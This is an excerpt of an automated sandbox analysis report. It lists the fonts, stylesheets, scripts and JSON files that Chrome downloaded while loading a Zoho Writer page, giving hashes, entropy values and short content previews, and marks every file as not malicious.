                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzIS_gEJJ1pdy6_NJowSBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUN7fTW7hIFDdirFiUSBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNG-hw3RIFDR17Q8ISBQ21MyLnEgUNFUTtqxIFDduUy4MSBQ2RYZVOEgUNr5xECBIFDbqgcHkSBQ1UoEt6EgUN3sphyxIFDZFhlU4SBQ00p0lEEgUN5X_4rhIFDdKjMpQSBQ0SHd9BEgUNMa7NYhIFDZGngLsSBQ3N100qEgUNCwlxERIFDY1yYm4SBQ2RYZVOEgUNiixggQ==?alt=proto
                                                    Preview:CrsCCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcN7fTW7hoACgcN2KsWJRoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNG+hw3RoACgcNHXtDwhoACgcNtTMi5xoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 59212, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):59212
                                                    Entropy (8bit):7.995946438480689
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:B5E7A732DD888ADF76EDE8FDD0796311
                                                    SHA1:3FEEF71141447560BE853E0C9E3EF7EB716729C6
                                                    SHA-256:16DA43B88280476CFFE69F798BB1D62EE5CE0B4439D6CFE8DDD7BB3126BA1B16
                                                    SHA-512:1233BAFBFC1E6D846936D85BB716C6AF05C74BCA9D72A90B8C3B3583CFECBCE4EDA29BAFCE8A87859144BF9682B16BB9F84F8DE42946AC62EB6B7191FE68AA2F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Bold_Italic.woff2
                                                    Preview:wOF2OTTO...L.......|...............................M..h..&..*.`..X.6.$..8....0. [...A.cx........(..g3Ea./...t....:4.{\Pv{P..C.=5*.................EQUA1..Wu..G.5.Q.....Xka..x.U..=.....g.t}.`|..v.....n. .......}.....9...d..j...y..8i+..N..rX.`:*.0?B....n.........6e?...^P)....i..o.[..W...:.Ls=.}={.....w|9..D.3..H......v^pj.........0.s...=.........f.."HhM...C.......n.&.2jY...>..q...>.....D......Ru..s.8....'.3.?...L7.J..o..Z.t"0....dr+.BJ....}.x9.........k.*..k....P....g...........#E..TD.<...q.R.#s...R9:-DZN.SN..0......m...6.....o.o.g.Y..&.Py.B."}HB*.y.........jWZY.=...=..Dp...."..\...jStn.....U....N.....8...aQ.%V.PN.P.L.....\....~~.0.7_k..R...M........@....n~.D.Ec../.b...fS.S.........o[......|.z.<..S.8m...0D...(...".1....1.L.,fP[.S....t..G..hY...'.u..o....{..`=...}......}._U....9..d....B.!..Q.g........d,.!.....#cY.G...X....U....A.....k.C...%.,$.N...ER`.$O:...../r.6..ZT....c.o.#O....h.h$..N.K.y.bM.N............z.....w.W... ;.......&.\.T..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):199224
                                                    Entropy (8bit):5.1500037474309845
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4888E7BC457A79B37EC09B2D02D357A9
                                                    SHA1:59997DF28863287E4D7D67F5A399993542FDC7D9
                                                    SHA-256:3CC211880226E4183527268F6F4CB6F9801276231C1464F94C1106C841AE7432
                                                    SHA-512:9D4C991299A5D66D37585BBE81AD7C275ABDB44A8E1FB847FEE369C634A49E3B75EFC144716F0970F025E8637DD5FEC3D0B506A47840E1DD22113086F0DB990A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/styles/common/writer_common_min_all.4888e7bc457a79b37ec09b2d02d357a9.css
                                                    Preview:html,body{width:100%;height:100%}body,input,textarea,select,button{font-family:var(--ff-base);font-size:13px}body{line-height:1.42857143;color:var(--clr-df);background-color:var(--writerBg);margin:0;overflow:hidden}body ::-webkit-scrollbar{width:6px;height:6px}body ::-webkit-scrollbar-track{background:transparent}body ::-webkit-scrollbar-thumb{background-color:var(--scrollBarBgClr);border-radius:20px}textarea{resize:none}ul{list-style:none;margin:0;padding:0}img{border:0;vertical-align:middle}.ui-icon{width:16px;height:16px}.ui-no-margin{margin:0}.ui-top-margin-1{margin-top:1px}.ui-top-margin-verysmall{margin-top:3px}.ui-top-margin-small{margin-top:5px !important}.ui-top-margin-sm{margin-top:8px}.ui-top-margin-small-6{margin-top:6px !important}.ui-top-margin-medium{margin-top:10px !important}.ui-top-margin-large{margin-top:15px}.ui-top-margin-xl{margin-top:20px !important}.ui-top-margin-xl-25{margin-top:25px !important}.ui-top-margin-xxl{margin-top:30px}.ui-top-margin-xxxl{margin-top:5
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 64124, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):64124
                                                    Entropy (8bit):7.996633888563706
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:1866A806D955063D6E90DC28CE73DA05
                                                    SHA1:C9D64A077B8E08CB91C3DF0B7F14A0938CB05CD7
                                                    SHA-256:E7A2F3379EEBD6CA74C3EED3E2BABD43CA2E0EA152628777788B4C396E711861
                                                    SHA-512:8D5CF2AC123B8B26D8CCA205363144ABF139BC62814148B731861042D5439C0AEF3374443AB44F97DC8D76B585AB53E83C5E8708824191B4783216F64E0BCE8A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Regular_Italic.woff2
                                                    Preview:wOF2OTTO...|...........).............................. ...X..*.`..X.6.$..8....d. [..q&L...H.n.....T... .a*..O..`.......fbA.;.s....oH."W3[fw..M)..p...H.RK5$.[.....R...R(...8.7j.....zB..p..U..9"..N...<W4\..>o.....C.}..;.2.,.)Q#.....a....(.,....Q.V....8..L..r.T..iDT;..........7..1...$r....W>.id..EP.....".C*.B....j$..-n,......4.>..J(...X.w......).&..PP:\.....l.5....xL..?^..?.n....U7.(...P._.`..g...h.wju.K<Q...p.....#D9.:...P=L.X..^>I.....`.. ..S.......6..`.t*>../.......0.....P.1.U.{33g>..Y.n..UJ[.<H. .H..w..t:.MD..n.aU.b....T(..C..p.....m}...;..%........._.L[.n.+S......~.i&.7*. @..D{.#..:.O..}..x~..(...P.&...R. 5......s...0..6.E!F2.J0".N..n..X$o.%........$...x.+i_.WqW.>.v...M@..ED....'"......y~.i..Y.=+.o.YkV._.ew.m...VmSz.K...C....j......>...!.%....B3.}6...(b.,...~6........}.s..U.7=........@P.hC<bhC..&1.u....o$................$p......@..D.o.==..#p.I...{....-.....v..Uo"..!$1...6BR.....iCA..x;..X#G..g.E_..#Y.;..M.....u.c..x.~E{...u.y.8....H&.L20...0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3377), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):3377
                                                    Entropy (8bit):5.241334753479973
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FD9F7DC2E511B6F3CFF4B78F7F72C0BA
                                                    SHA1:6BDE46F79A88A0C98BC60567BA21EC9C116140BF
                                                    SHA-256:92B2738E71A200B5642A2D7DEEE240268C6C180AC7911695243AA79AED9F648E
                                                    SHA-512:AA56CE5481ACD9CB676F5099644F4C4E2BE8237CC9476AB4A588A01572A286E874B54F437DF2541D5934A3DF7103DB60531326140E80E2C1C0C0E51FF3C23B9B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/js/wms_min_all.fd9f7dc2e511b6f3cff4b78f7f72c0ba.js?ms=1736357491452
                                                    Preview:function WmsContactImpl(){}WmsContactImpl.handlePresence=function(n,e,t,o,a){},WmsContactImpl.handleAddressBook=function(){},WmsContactImpl.handleInvitations=function(n){},WmsContactImpl.handleInvite=function(n,e,t){},WmsContactImpl.notifyInvite=function(n,e,t){},WmsContactImpl.handleAccept=function(n,e,t){},WmsContactImpl.notifyAccept=function(n,e,t){},WmsContactImpl.handleReject=function(n,e,t){},WmsContactImpl.notifyRemove=function(n,e,t){},WmsContactImpl.handleDelete=function(n,e,t){},WmsContactImpl.handleContactUpdated=function(){},WmsContactImpl.handleStatusMessage=function(n,e){},WmsContactImpl.handeAllStatusMessages=function(){},WmsContactImpl.handleHideContactsUI=function(){J("#wmstoolbar").children(".chat-buttonhide").removeClass("chat-buttonhide").show(),editor.onResize()},WmsContactImpl.handleShowContactsUI=function(){var n=J("#wmstoolbar");n.show(),n.children(":visible").not(".css-wmsbar-statusmessage, .wms-sm, .wms-md").addClass("chat-buttonhide"),J(".wms-colpsbar").css({
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):88883
                                                    Entropy (8bit):5.4907393745042485
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BA5D0E72501676097074B5646F169A42
                                                    SHA1:517B079ACCD3031A035F52C9E68D4C088BB10995
                                                    SHA-256:0E0238927BC86CB1DCF017C3B34A62162312AA995586C0B82FD4252B50A7E07B
                                                    SHA-512:366EFD1D32E1F8C4F42C50F2B1B25E9219F64A381EAF071897921EE5697100C76D8DB2DBA64CA0BD87EF7B160FF9904B13A071E120A00ECC293753081ACA6C84
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:var BulletinManager=function(e,n,t){this.bulletinCont=document.getElementById(e),this.bulletinDiv=null,this.props=n||{},this.titleHt=15,this.docHt=0,this.bulletinConHt=0,this.bulletinMap={},this.jobScheduler=new JobScheduler,this.drawtimer=0,this.onBullentinClick=t,this.init(e),this.bindEvents()};extend(BulletinManager.prototype,{init:function(e){this.bulletinDiv=document.createElement("div"),this.bulletinDiv.setAttribute("id",e+"-bulletins"),this.bulletinCont.appendChild(this.getTitleElem()),this.bulletinCont.appendChild(this.bulletinDiv),this.jobScheduler.setJobHandler(this.drawBulletin.bind(this)),this.jobScheduler.setTimer(this.props.timer||5)},getTitleElem:function(){var e=document.createElement("div"),n=document.createElement("span"),t="float:left; margin-top:2px; margin-bottom:2px; width:10px; height:10px;";return t+="background-color: "+(this.props.bgColor||"rgb(255, 245, 0)")+";",t+="border: 1px solid "+(this.props.borderColor||"rgb(255, 173, 0)")+";",n.style.cssText=t,e.style
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:downloaded
                                                    Size (bytes):52592
                                                    Entropy (8bit):5.168680715025103
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8187BB4A0AA88677A93BEB71AE1452C3
                                                    SHA1:4C6B3736569BC439A86D8CEA4464EB4626467C37
                                                    SHA-256:160B8E481A374E255B1589A7118B3AFCE3A245FC153B7AA1262643B8D1C1B2CB
                                                    SHA-512:D88F890C560590F904CA40C8E0D2EB1CB65EFB544D7D18E4FAA51457242148315071BA181BCB3A495E2C2C6A4C30F46F64032E7BD8AA08AFDF876698487DD12D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/supportedlanguages.8187bb4a0aa88677a93beb71ae1452c3.json
                                                    Preview:{.."af": {..."code": "af",..."name": "Afrikaans",..."nativeLangName": "Afrikaans",....."countryName": "South Africa",..."countryNameInNativeLang": "Suid-Afrika",..."countryCode": "ZA",..."currencyCode": "ZAR",..."timezones": ["Africa/Johannesburg"],..."isDateSupported": true, ..."isProofingSupported": true..},.."sq": {..."code": "sq",..."name": "Albanian",..."nativeLangName": "shqiptar",....."countryName": "Albania",..."countryNameInNativeLang": "Shqip.ria",..."countryCode": "AL",..."currencyCode": "ALL",..."timezones": ["Europe/Tirane"],..."isDateSupported": true..},.."am": {..."code": "am",..."name": "Amharic",..."nativeLangName": "....",....."countryName": "Ethiopia",..."countryNameInNativeLang": ".....",..."countryCode": "ET",..."timezones": ["Africa/Addis_Ababa"],..."currencyCode": "USD", ..."isProofingSupported": true..},.."ar": {..."code": "ar",..."name": "Arabic",..."nativeLangName": "....",....."countryName": "Yemen",..."countryNameInNativeLang": "...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 73968, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):73968
                                                    Entropy (8bit):7.997493530273907
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:7E946A703BF8311EC48F5B87C3D51593
                                                    SHA1:D40400802D5D23F01A6D046B45FE6470CFA09F93
                                                    SHA-256:C2522552BA036B4CF76BA13E3797C3F76D53243CA809A91EE96302A55CA43FAC
                                                    SHA-512:80F3D89D8B169747052C08816568497D0DE06CF2929DCAB46DBF647B03C6889144A55A7FCA50F0A3033FAABC9ADC8E4FE29BBE99DD5F4EFF9507647B5549FBE9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotomediumitalic/font.woff2
                                                    Preview:wOF2...... ........,.. ...#.....................?FFTM..~...$..L.`....\..<.....l..d.6.$..8..... ..@..f..X[...5..&sBie..I....c..M....i.pxM.g..'..G...8............I.8.......j.&"R....AD..d.&Z..mD8:.z.b].. ....)..LF".",l<.....do....j...^3 .L.....r.(..f..>Zb........a.+..9..c..W0w;....nE>9.RJV.X.yJ.q.yLU^.<.N.d.I.-..%.t.#..`.*.[.Ha..}%...).3Y.S.a\cwK..C.Y.....$..,...pjO......C7...-..q.{.....&L..IC..&.Y.....h.0.....N...e.r-G..yb.N!..}.I...o.\.V.....I..q}.....g........+%W.o.........c...R....z.[.i...?...NQD.Q.&...6.Nr...i'0..h....U..'...O...t..*.d"!)E...'.\....~.....;w.m..u..g..0.CK3.4.........`....U-!QR.........h...z....o...RJ;dZ...%.E.k.h..<.q...{.h)o..D.i<.&..d%....?.....Y.Q..K.....pw.lz.Kq..[..;3.....|.......Eh<..C....[|......n.nb.0rD.E...a4V.D.9;...bB...B.x....M.PIy....w.o....>HI...<(..gx0.....b..h....i..V`j/.b......y1.].s..X..R$..~DX..Q.tx...o{.{.XRI.Lq...D.4...h"D.......zw..}..O..P...H.!.a.h.!. ,....nd.9.9..\kV3..*./..!..C.|.Z........^.I.f......G.G
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:downloaded
                                                    Size (bytes):595081
                                                    Entropy (8bit):5.523689852148849
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:EB67FA0DB47B18E9B250AAF10AEC4E70
                                                    SHA1:3E595D3E0993EF6E4910C65D2DA3D6730DD7A3A3
                                                    SHA-256:240DC14606431FFEEE9CEC9E6664C7CFC32EC04C69A852A60E2D33E4D7D2BFE3
                                                    SHA-512:C785B9F636FF8CC058CFEC0A34BBA9F73AA9BFEF5555FB6A653E0A5EA6ACB54887DE321242ABDFA5A846F0A8161159DC484191601FFA3090CCD5C99731B31E8F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/bluepencil/v5_7_2/js/zbluepencil_web_min_all.js
                                                    Preview:var Deferred=function(){function d(e){return"[object Array]"===Object.prototype.toString.call(e)}function g(e,t){if(d(e))for(var n=0;n<e.length;n++)t(e[n]);else t(e)}function u(e){var i="pending",a=[],r=[],o=[],s=null,n={done:function(){for(var e=0;e<arguments.length;e++)if(arguments[e])if(d(arguments[e]))for(var t=arguments[e],n=0;n<t.length;n++)"resolved"===i&&t[n].apply(this,s),a.push(t[n]);else"resolved"===i&&arguments[e].apply(this,s),a.push(arguments[e]);return this},fail:function(){for(var e=0;e<arguments.length;e++)if(arguments[e])if(d(arguments[e]))for(var t=arguments[e],n=0;n<t.length;n++)"rejected"===i&&t[n].apply(this,s),r.push(t[n]);else"rejected"===i&&arguments[e].apply(this,s),r.push(arguments[e]);return this},always:function(){return this.done.apply(this,arguments).fail.apply(this,arguments)},progress:function(){for(var e=0;e<arguments.length;e++)if(arguments[e])if(d(arguments[e]))for(var t=arguments[e],n=0;n<t.length;n++)"pending"===i&&o.push(t[n]);else"pending"===i&&o
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1000), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):1000
                                                    Entropy (8bit):4.5692005821269195
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:708F783D2B3851950CA338C17990DAD2
                                                    SHA1:A88AE5245130259691F858BBEEB573EC5399FEAA
                                                    SHA-256:7FA34FE6138598DE501E7A40A4ABA21E8EF2200BE7185B3024AEBFF093EE6DE6
                                                    SHA-512:4E3755E33E2FA8672168052AA01F236B07BD916C5B7C43812651C1780EAE7058F587F009D431A0E83BD08993F1E7485E1CEE2C8F5011A62B5995AA529EC1B384
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISzgQJnJIhVQ1gwQMSBQ0OSxGBEgUN6eNTdBIFDR3cwiISBQ2C9fguEgUNkWGVThIFDe301u4SBQ2RYZVOEgUN2KsWJRIFDZFhlU4SBQ1hzte8EgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ1ATKydEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNrzE0ixIFDWKNrIASBQ2DZL2uEgUNkWGVThIFDRvocN0SBQ2RYZVOEgUNHXtDwhIFDZFhlU4SBQ21MyLnEgUNkWGVThIFDRVE7asSBQ3blMuDEgUNkWGVThIFDZFhlU4SBQ2vnEQIEgUNuqBweRIFDVSgS3oSBQ3eymHLEgUNkWGVThIFDTSnSUQSBQ3lf_iuEgUN0qMylBIFDRId30ESBQ0xrs1iEgUNkaeAuxIFDc3XTSoSBQ0LCXEREgUN06X0ChIFDYZyDWkSBQ2NcmJuEgUNkWGVThIFDYosYIESBQ2RYZVOEgUNBu27_xIFDWbPQwsSBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2BkPF8EgUNkWGVThIFDYGQ8XwSBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNgZDxfBIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ3sgDyEEgUNabUwmQ==?alt=proto
                                                    Preview:CusFCgcNDksRgRoACgcN6eNTdBoACgcNHdzCIhoACgcNgvX4LhoACgcNkWGVThoACgcN7fTW7hoACgcNkWGVThoACgcN2KsWJRoACgcNkWGVThoACgcNYc7XvBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNQEysnRoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNrzE0ixoACgcNYo2sgBoACgcNg2S9rhoACgcNkWGVThoACgcNG+hw3RoACgcNkWGVThoACgcNHXtDwhoACgcNkWGVThoACgcNtTMi5xoACgcNkWGVThoACgcNFUTtqxoACgcN25TLgxoACgcNkWGVThoACgcNkWGVThoACgcNr5xECBoACgcNuqBweRoACgcNVKBLehoACgcN3sphyxoACgcNkWGVThoACgcNNKdJRBoACgcN5X/4rhoACgcN0qMylBoACgcNEh3fQRoACgcNMa7NYhoACgcNkaeAuxoACgcNzddNKhoACgcNCwlxERoACgcN06X0ChoACgcNhnINaRoACgcNjXJibhoACgcNkWGVThoACgcNiixggRoACgcNkWGVThoACgcNBu27/xoACgcNZs9DCxoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNgZDxfBoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcN7IA8hBoACgcNabUwmRoA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 68152, version 2.8978
                                                    Category:downloaded
                                                    Size (bytes):68152
                                                    Entropy (8bit):7.996978341917858
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:0D8BBCA1E66BA27F16A02C686511EB4C
                                                    SHA1:6434AAD3EA1374E3E3B3563BA841185BCF343C33
                                                    SHA-256:052880FDA6FF58C9649FBC2D075C180AED3A5A617EE6A5DFC1A2D40BF3871245
                                                    SHA-512:B952793E50B40A02FD2CAE2EF962DF9777349280329655529B52EF5C35CDE28463F63328B787836D2C2F707E536A028791194D5E861A1DF639B9AD616A7332D4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/robotomedium/font.woff2
                                                    Preview:wOF2.......8..............#.....................?FFTM..~...$..L.`....\..<.....p..@.6.$..8..... ..r..f..S[X......~.....nRU<.......q.;".....CIq... .>J.Z'.~.!..........,...m.mU......$..1h.i2....YFT..P.....j)..`....@.....2T.Q.c.LR..)..h:."..y..U.>&"..k.zP..&"...s..F...&."@}A....h.F*6..;e...I..~.i\.%A.....4....i$Y..2..q.v...U......V....K.t..i.km.|..^(...A;....R.%vs...7.7...m./'...<.r.....r.......f.f.a.....j.J&M...1m.'.-Gd..6...zk...=Wy8g..5.....e.#f...e..%....*...!...S... .T....=.&...`.....N.J}....2|...#...7p..XI....~.8n].E2$m6..}.0.M.|Z..g.t.....>.......$.I.)...<.8vG.......kp..!R.RF..E..%...t....H.A8........_....?.b$.|F..*.,I.k........@......c.....s..}.W.S.W1...uQ..p~w...|..L.......D.[..../..Zt..-......w..fW..V...h?.J&.7.L..:;..]h..U.*..........^."...t.Ex.0.Y....6.u......*.D.$...,@D.Y.....N....5......?D..=w{..u.QJ......fY.eI...n...c".._e<.. ......,9.;n..e..3+...L\...<...X.y|..L....Ln.........^W..H,.3.h@j.n....E/j..A.`..VP.......t..dZ.&.(=..Etpm
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65447)
                                                    Category:downloaded
                                                    Size (bytes):89501
                                                    Entropy (8bit):5.289893677458563
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 54808, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):54808
                                                    Entropy (8bit):7.996252347170685
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:157A357B6F47D13A8049CFCDE2663433
                                                    SHA1:191FD8EF96021BAF07BAD93C83B2CDA15DB1FA43
                                                    SHA-256:F01F22BE37D334C729AE73555CA608F672BBB9F3014D034459A6B31C4E0F7BC5
                                                    SHA-512:C2E9BC6362C0CC7CF3EB9DF8B1260A99B93A302C27F4C50DDBCD62408358457D144A356529879CA3CCAB5BD37953FE844F7705F716EFE813190735558C1C0CF4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Bold.woff2
                                                    Preview:wOF2OTTO..........ld..................................h..&..*.`..X.6.$..8....d. [.kq&.1.C.n`.......j......5.m.7N.....(.=.w.L...N.....'...m.....P.j........r.m&.T.......j..k..Z..l..."v.#....j.L..ffN.v..mC....w<...W.4.Y..B.......I.XM...*...j...L.K..K....S.......u...5F..>...q.A....0..D|8.n.......*....<..p.&.EC(.DHV..%......p.?.|nu..1..sZ.)..y9.?.]...d...N..D .@.n...[x.m..bN'...r.?a....R2.v..z....4....-..mM..D......0".N.#..0.x....so...y..iD...Ps.(...f...:.h...g...ff..fff...yff...|..1.Z.$...IB..J.....J../..sr]S...m..}.5.B....."C.ET..A0........)Fc6s...h..x....$'....3 ...p...U.....J...J......~.....Cv..........eZ..).M..@$$..............y...b&G.x.../.......................1D..3.!.!%L....a.o...HH....i.u....0......Y...,IV.(s@......9X..<....n....^U..w.h..5@.....ze.ns./.. lr.K.....}UU.U. ..u...............xe..O...-....... *.L..j....khQ.^.@...+. ..!......SQ..._..L...2.).L,..@.x,.K..k.f...a..............o1..I..4.....K..(..n...:.$..R.G.....W.....5.r}......#...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 55176, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):55176
                                                    Entropy (8bit):7.99622614650584
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:0A9250D09BB665A32174D1E1815A14B4
                                                    SHA1:4A4A5DFD0E0C0CFE4FB6AF1BEC9E041A9D58063C
                                                    SHA-256:BAC9A1E0823048221D5D628EF895519F4219BF7A63BEFE66D9082BA92140B547
                                                    SHA-512:2CAF2D9BA98404974948C2E91876E7079394E7D837D8F63B7B4DF5692A8068F315B5230F46C2F1A84CD7A71864BE490B6731FA530DF5B3CFA8FF6988F6C64327
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Medium.woff2
                                                    Preview:wOF2OTTO.........w....6...........................k..n......*.`..X.6.$..8....A. [.v...H.G.F....nae....u...D...sc7.W&q\.n.'1.U............^&2f.CvIZ.....n. ss.'.%k.......R..bZ.V.E. VK#{...^..e~......W;j.-..d..2..V...9..V.Q..3O*;.8..ga!h..........k~_.!.....>.._.a........W..KrY7.2...7.u..b.r.,..8...("..9.5...%...s|>..i.:..'...V.).d"...Q..4...l.].Tt..2'.T.......X.7Bv......6"......s....%..)8^..A\.g.>...../`..%.7...{..N...'?a....R..]...R..Gz..E....7...%.3..,B.....I......QQ..#....QQ.Pg.y.r..\..e.m....v...........F.9R0.,*D.....R.....cD.An......G.x'......>...g..B...G.H....E..U.&..}..8.'.b.......o..d.?....@8.Ci,..|....&..3}u(.D...`...{.....wV.V}.>...?........Wy......R.e.Q.PTl..3..j..XZ4.Hk.P.P..bj5....@......>...........%..3).D..q.I.F .0r.!.q....$.H2..$.6.". S.w....:K....E`iA`....q.m>...&5...]....j.2.?.../%......S.{.A.)q..$nn[.. `. @&......_.EAB...!.PL....o......[..........[..w.9u.%.......`...1....V0.5..Z.....3.............tWk../...>:.../. .@.j ..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 51120, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):51120
                                                    Entropy (8bit):7.99594457148098
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:DA6C59DC1049296DB541FBC5A495C56C
                                                    SHA1:D3C725CE6CB27607026DA2F91D6E66A3EC27517F
                                                    SHA-256:056764DABF96348091001138CE4C1E15AC54AB54666A4C163F573DD4A4292CA9
                                                    SHA-512:A772950524E80FA1576A083F1E1D7EF4201E6F503552D49992B26D05DBE5C17558594638B9AECF83B8BD5226AAAE19C0414BA59F5D807A692B3C40B002004577
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Extrabold.woff2
